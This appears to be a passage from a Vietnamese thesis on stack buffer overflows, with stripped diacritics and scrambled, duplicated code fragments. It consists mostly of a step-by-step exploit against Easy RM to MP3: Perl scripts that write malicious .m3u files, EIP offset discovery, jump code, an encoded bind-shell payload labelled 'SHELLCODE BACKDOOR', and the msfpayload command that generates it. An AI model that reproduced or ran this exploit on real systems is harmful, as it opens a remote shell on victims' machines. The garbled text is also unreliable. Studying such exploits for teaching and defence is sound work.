my $preshellcode = X x 54;
my $nop2 = \x90 x 230;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print Size of buffer : .length($buffer).\n;
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);
print m3u File Created successfully\n;
Khi ng dng cht, chng ta c th thy 50 NOPs ca chng ta bt u t 000ff848, tip theo l
shellcode (0x90 ti 000ff874), v sau mt ln na tip theo ca A
iu th hai chng ta cn lm l xy dng jump code. Mc tiu ca jump code l nhy ESP+281.
Nhy ESP+281 yu cu: Add 281 vo thanh ghi ESP, sau jump esp. 281 = 119h. ng c gng cho
tt c vo mt lnh, hoc opcode s c null bytes.
V c NOP pha trc, nn khng cn thit phi chnh xc hon ho. Min l chng ta thm 281 ( hoc
hn), n c th lm vic. C 50bytes cho jump code, khng phi l vn .
Tin hnh thm 0x5e (94) 3 ln, sau jump to esp, m assemly s l:
0:014> a
7c901211 add esp,0x5e
add esp,0x5e
7c901214 add esp,0x5e
add esp,0x5e
7c901217 add esp,0x5e
add esp,0x5e
7c90121a jmp esp
jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
7c901211 83c45e
add
esp,5Eh
7c901214 83c45e
add
esp,5Eh
7c901217 83c45e
add
esp,5Eh
7c90121a ffe4
jmp
esp
my $shellcode = \xcc;
my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = BBBB;
my $preshellcode = X x 4;
my $jumpcode = \x83\xc4\x5e .
#add esp,0x5e
\x83\xc4\x5e .
#add esp,0x5e
\x83\xc4\x5e .
#add esp,0x5e
\xff\xe4;
#jmp esp
my $buffersize = 26094;
my $junk= \x90 x 200;
my $nop = \x90 x 50;
\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43 .
\x51\x42\x4c\x45\x33\x45\x50\x41\x41;
my $eip = pack(V,0x01ccf23a);
my $preshellcode = X x 4;
my $jumpcode = \x83\xc4\x5e .
\x83\xc4\x5e .
\xff\xe4;
#add esp,0x5e
#add esp,0x5e
#jmp esp
Popad: lnh ny gip chng ta nhy ti shellcode kh tt. popad (pop all double) s ly double words
t trong stack (ESP) vo cc thanh a nng ch trong mt ln. Th t cc thanh ghi c np l: EDI,
ESI, EBP, EBX, EDX, ECX v EAX. Kt qu l ESP s tng ln sau mi ln load vo, mt popad s ly
32bytes t ESP v t vo cc thanh ghi theo th t.
Popad c opcode l 0x61.
Gi s bn cn nhy 40bytes, m ch c vi bytes thc hin lnh nhy, c th dng 2popad tr ESP
ti shellcode ( vi mt vi bytes NOP b vo 232 40)
By gi chng ta s s dng Easy RM to MP3 demo k thut ny. Vn s dng script c, chng ta
s xy dng buffer gi ti 13 X, tip theo l mt s bytes rc ( D v A), ri n shellcode ca chng ta
( NOP+A).
my $file= test1.m3u;
my $buffersize = 26094;
my $junk= A x 250;
my $nop = \x90 x 50;
my $shellcode = \xcc;
my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = BBBB;
my $preshellcode = X x 17;
my $garbage = \x44 x 100
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print Size of buffer : .length($buffer).\n;
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print m3u File Created successfully\n;
M file bng Easy RM to MP3, ng dng s b sp
Gi s chng ta c 13X s dng ( s t popad y) nhy qua 100 D v 160 A, tng cng l
260bytes s n shellcode ca chng ta ( bt u bng NOP ri n 1 break cc ri n A). Mt popad
= 32bytes, 260bytes = 9popad ( -28bytes), v vy cn phi bt u shellcode vi NOPs, hoc bt u
shellcode cch 28bytes. Trng hp ca chng ta s t NOP trc.
Trc tin ghi EIP vi jmp esp ( xem li cc phn trc). Sau , thay X bng 9 popad, tip n
l opcode jmp esp (0xff,0xe4).
my $file= test1.m3u;
my $buffersize = 26094;
my $junk= A x 250;
my $nop = \x90 x 50;
my $shellcode = \xcc;
my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack(V,0x01ccf23a);
my $preshellcode = X x 4;
$preshellcode=$preshellcode.\x61 x 9;
$preshellcode=$preshellcode.\xff\xe4;
$preshellcode=$preshellcode.\x90\x90\x90;
my $garbage = \x44 x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print Size of buffer : .length($buffer).\n;
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print m3u File Created successfully\n;
Sau khi ng dng sp , dng ti im break, ESP v EIP nh sau: eip=000ff874 esp=000ff850
Popad lm vic v t ESP ti NOP ca shellcode, sau thc hin jmp esp (0xff 0xe4) lm EIP
tr ti NOP. Thay th A bng shellcode thc s:
Mt cch khc ( t c a thch nhng vn c kh nng) l nhy n shellcode bng jumpcode s
dng a ch ( hoc offset ca thanh ghi). T khi m a ch thanh ghi khc nhau trong cc chng
trnh thc thi cch ny khng cn c hiu qu.
V vy, tin hnh hardcode a ch hoc offset ca thanh ghi, bn cn tm opcode nhy, sau ,
s dng opcode ny trong on buffer nh nhy ti shellcode thc ca bn.
Di y l 2 v d gip bn tm c opcode:
1. jump to 0x12345678
0:000> a
7c90120e jmp 12345678
jmp 12345678
7c901213
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e e96544a495
jmp
12345678
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 81c324010000
7c90121a ffe3
jmp
add
ebx,124h
ebx
SHELLCODE BACKDOOR
\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44 .
\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a .
\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a .
\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c .
\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a .
\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45 .
\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50 .
\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45 .
\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c .
\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43 .
\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43 .
\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42 .
\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48 .
\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43 .
\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42 .
\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48 .
\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51 .
\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42 .
\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42 .
\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48 .
\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43 .
\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e .
\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50 .
\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50 .
\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a .
\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50 .
\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45 .
\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50 .
\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b .
\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47 .
\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42 .
\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b .
\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49 .
\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42 .
\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48 .
\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b .
\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48 .
\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b .
\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c .
\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48 .
\x50\x41\x41;
open($FILE,>$file);
print $FILE $junk.$eip.$shellcode;
close($FILE);
print m3u File Created successfully\n;
T vic nghin cu v l hng bo mt phn mm, chng ta nhn thy vic m bo cho phn mm
c an ton l v cng quan trng. m bo cho mt sn phm phn mm c an ton th
nhng iu sau y l khng th thiu:
Tun theo qui trnh pht trin phn mm nghim ngt, y ng bc. iu ny s trnh
S dng mu thit k an ton. y l cch m cc nh pht trin lun lun chn la. Cc
mu thit k an ton c kim nghim v nh gi, khi s dng chng s trnh nguy c pht sinh
li bo mt phn mm.
vin c kinh nghim trong lnh vc pht trin phn mm. H l nhng ngi trc tip vit ra cc sn
phm phn mm. Do h ng vai tr quan trng trong vic m bo an ton cho sn phm phn
mm.
Thc hin kim th phn mm. y l khu bt buc v khng th thiu c nu mun sn
phm l an ton.
trin hin nay l vic thu cc hacker gii th tn cng sn phm ca ho. T h c th pht hin
c nhng li m h khng ng ti.
4) Tm hiu cc cch m lp trnh vin, ngi kim th v hacker pht hin ra li bo mt phn mm.
5) Phn tch chi tit li trn b m trn stack, cch thc tm ra li ny v cc bc khai thc thnh
cng li ny.
6) Tm hiu cc cch m hacker s dng nhy n shellcode.
7) Khai thc th nghim li trn b m trn stack thnh cng
Hng pht trin ca ti l m rng nghin cu li trn b m trn stack vi trng hp kh hn
l khng c on b nh no lu tr shellcode cn phi chia nh shellcode lu trn cc phn
on b nh nh. M rng nghin cu k thut nhy ti shellcode SHE. M rng nghin cu cc li
khc nh li trn b m trn heap, li double free, li use after free cng nh cch tm v khai thc
cc li ny.
PH LC
1.
1.
Phn on .text
Phn on ny tng ng l phn ca file thc thi nh phn. N cha cc ch th lnh (m my)
thc hin cc tc v ca chng trnh. Phn on ny c nh du l ch c v s gy ra li nu
nh ghi trn phn on ny. Kch thc l c nh ti lc thc thi khi tin trnh ln u tin c np.
1.2.
Phn on .data
Phn on .bss
Below stack section (.bss) l c s dng lu tr cc bin ton cc nhng khng c khi to gi
tr ban u nh l : int a;
Kch thc ca phn on ny cng c nh lc thc thi chng trnh.
1.4.
Phn on Heap
1.5.
Phn on Stack
2.
Code segment: m lnh hng dn b x l thc thi. (EIP tr n m lnh s c thc thi tip
theo)
Stack segment: c s dng truyn data ( d liu) tham s ( agrument) vo trong hm,
2.1.
xc v c s dng lu d liu.
EDX data : thanh ghi m rng ca EAX. Cho php cc tnh ton phc tp hn ( multiply
divde) bng cch cho php m rng lu tr d liu to iu kin cho tnh ton ( nh lu thng s
vo EAX, phn d vo EDX chng hn)
2.2.
Process Memory
V tr ca main excute
Tr n loader data ( s dng hin th tt c dll / module c load trong tin trnh)
V tr ca PEB trong b nh
Phn on text ( text segment) trong program image l read-only, v ch bao gm application code.
iu ny hn ch sa i application code. Data segment c s dng lu tr bin ton cc
(global) v bin tnh (static). Data segment c s dng khi to global variables, strings,
constants.
Data segment c kh nng ghi v c size c nh. Heap segment c s dng cho cc phn cn li
ca program variables. N c th pht trin ln hn hoc nh hn thit k.Tt c b nh trong heap
c qun l bi thut ton cp pht v thut ton thu hi. Mt vng nh c dnh ring bi thut
ton. Heap s pht trin a ch ln cao hn.
Trong dll, cc m, u vo (danh sch cc hm c s dng bi dll hoc dll khc v ng dng), u
ra l mt phn ca .text segment.
1.
3.
PH LC 3
cha cc thng tin pht cht, khng c trong cc bn thuyt minh s dng ca chng trnh . Tn
gi in hnh ca tp.
instance methods : Phng thc hng i tng, s dng trong ngn ng lp trnh hng i
tng.
NOP (No Operation Performed) : gp lnh ny chng trnh s chy qua m khng thc hin
bt k hnh ng no.
ng my, n c tc dng hng dn cho my cc thao tc cn phi thc hin. Cu trc opcode ty
thuc vo tng loi my v ngn ng m b x l m my c th nhn bit.
Payload : L phn d liu chnh. y Payload l phn shellcode m metasploit cung cp.
Devcpp : y l mt chng trnh my tnh h tr vic vit v bin dch ngn ng lp trnh
C/C++.
1.
4.
Code
Mnemonic
Description
77 cb
JA rel8
73 cb
JAE rel8
72 cb
JB rel8
76 cb
JBE rel8
72 cb
JC rel8
E3 cb
JCXZ rel8
E3 cb
JECXZ rel8
74 cb
JE rel8
7F cb
JG rel8
7D cb
JGE rel8
7C cb
JL rel8
7E cb
JLE rel8
76 cb
JNA rel8
72 cb
JNAE rel8
73 cb
JNB rel8
77 cb
JNBE rel8
73 cb
JNC rel8
75 cb
JNE rel8
7E cb
JNG rel8
7C cb
JNGE rel8
7D cb
JNL rel8
7F cb
JNLE rel8
71 cb
JNO rel8
7B cb
JNP rel8
79 cb
JNS rel8
75 cb
JNZ rel8
70 cb
JO rel8
7A cb
JP rel8
7A cb
JPE rel8
7B cb
JPO rel8
78 cb
JS rel8
74 cb
JZ rel8
0F 87 cw/cd
JA rel16/32
0F 83 cw/cd
JAE rel16/32
0F 82 cw/cd
JB rel16/32
0F 86 cw/cd
JBE rel16/32
0F 82 cw/cd
JC rel16/32
0F 84 cw/cd
JE rel16/32
0F 84 cw/cd
JZ rel16/32
0F 8F cw/cd
JG rel16/32
0F 8D cw/cd
JGE rel16/32
0F 8C cw/cd
JL rel16/32
0F 8E cw/cd
JLE rel16/32
0F 86 cw/cd
JNA rel16/32
0F 82 cw/cd
JNAE rel16/32
0F 83 cw/cd
JNB rel16/32
0F 87 cw/cd
JNBE rel16/32
0F 83 cw/cd
JNC rel16/32
0F 85 cw/cd
JNE rel16/32
0F 8E cw/cd
JNG rel16/32
0F 8C cw/cd
JNGE rel16/32
0F 8D cw/cd
JNL rel16/32
0F 8F cw/cd
JNLE rel16/32
0F 81 cw/cd
JNO rel16/32
0F 8B cw/cd
JNP rel16/32
0F 89 cw/cd
JNS rel16/32
0F 85 cw/cd
JNZ rel16/32
0F 80 cw/cd
JO rel16/32
0F 8A cw/cd
JP rel16/32
0F 8A cw/cd
JPE rel16/32
0F 8B cw/cd
JPO rel16/32
0F 88 cw/cd
JS rel16/32
0F 84 cw/cd
JZ rel16/32
1.
5.
Th vi 10000 A
x 10000
Th vi 20000 A
x 20000
Th vi 30000 A
x 30000
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = "B" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
EIP=42424242. Kt lun EIP nm khong 25000 30000
Xch nh chnh xc EIP bng cch s dng 2 tool pattern_create.rb vpattern_offset.rb trong th mc
tool trong metasploit framework3
Bc 6: bt bactrack, vo th mc /pentest/exploits/framework/tools
./pattern_create.rb 5000
c kt qu a vo $junk2 bc sau
Bc 7: Thay i code perl
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = dua 5000 ky tu vua tao vao day
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Bc 8: s dng ./pattern_offset.rb 0x356A4234 5000
1064 -> EIP vi tr 26065
Bc 9: thay i code perl xc nh chnh xc EIP
my $file= "eipcrash.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
Bc 10: Tm khng gian b nh t shellcode
S dng code perl vi shellcode c m phng nh di di 144 k t (c th nhiu hoc t hn)
my $file= "test1.m3u";
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Gi ta iu khin EIP.
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x01a4f23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc;
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Chy thnh cng. Tuy nhin nu a ch ghi vo eip m cha null bytes th ta li phi s dng cch
khc nhy ti shellcode
Bc 15: Ly shellcode hon thin exploit
M backtrack v g cc lnh sau
Cd ~
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 R | msfencode -e x86/alpha_upper
-t perl
[1] Ph lc 3 Trang 89
[2] Ph lc 1 Trang 85
[3] Ph lc 3 Trang 89
[4] Ph lc 2 Trang 87
[5] Ph lc 3 Trang 89
[6] Ph lc 3 Trang 89
[7] Ph lc 3 Trang 89
[8] Ph lc 1 Trang 85
[9] Ph lc 3 Trang 89
[10] Ph lc 1 Trang 85
[11] Ph lc 1 Trang 85
[12] Ph lc 3 Trang 89
[13] Ph lc 3 Trang 89
[14] Ph lc 3 Trang 89
[15] Ph lc 3 Trang 89
[16] Ph lc 3 Trang 89
[17] Ph lc 3 Trang 89
[18] Ph lc 4 Trang 90